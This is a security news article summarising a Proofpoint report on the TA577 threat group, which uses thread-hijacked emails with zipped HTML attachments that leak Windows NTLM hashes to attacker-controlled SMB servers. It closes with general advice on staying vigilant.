A recent report from security firm Proofpoint has revealed that a threat group, identified as TA577 or Hive0118, is actively targeting organizations by sending rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information when opened. This group, known for being a financially motivated initial access broker, has been carrying out campaigns that have affected hundreds of entities with thousands of malicious email messages.

The NTLM authentication mechanism is commonly used in Windows networks when a computer attempts to access network resources or services, such as file shares over the SMB protocol. While NTLM credentials are not sent in clear text, they are transmitted as a cryptographic hash, which can potentially be exploited to recover passwords or used in various types of attacks.

Researchers at Proofpoint noted that TA577 has been observed delivering malware, with their latest campaign involving the theft of NTLM credentials. This particular attack chain, first observed on 26 February, is unusual for this threat group. Previously, TA577 has been known to distribute malware such as Pikabot through different attack chains.

In addition to distributing malware, TA577 is also involved in selling access to compromised systems to other cybercriminal groups. The compromised systems have often been subject to ransomware attacks, particularly with the Black Basta ransomware. One of the techniques used by TA577 is thread hijacking, where rogue email messages are crafted to appear as replies to legitimate emails sent earlier.

The recent campaigns conducted by TA577 utilized emails that appeared to be follow-ups to previous messages, asking recipients to review a document sent earlier. These emails contained a .zip archive along with a password for unpacking it. Inside the archive, there was an innocuous-looking HTML document personalized for each victim. When opened, the HTML file triggered an automatic connection attempt to a remote SMB server controlled by the attackers.

TA577 has a history of distributing various trojan programs and has been associated with malware such as IcedID, SystemBC, SmokeLoader, Ursnif, Cobalt Strike, and the more recent Pikabot. The threat group’s activities pose a significant risk to organizations, as the stolen NTLM credentials could be used in further malicious activities.

It is crucial for organizations to remain vigilant and implement robust security measures to protect against such threats. Regular security awareness training for employees and the use of email filtering tools can help in detecting and mitigating these types of attacks. Collaborating with cybersecurity experts and staying informed about the latest threat intelligence can also assist in preventing and responding to potential security breaches.

Source link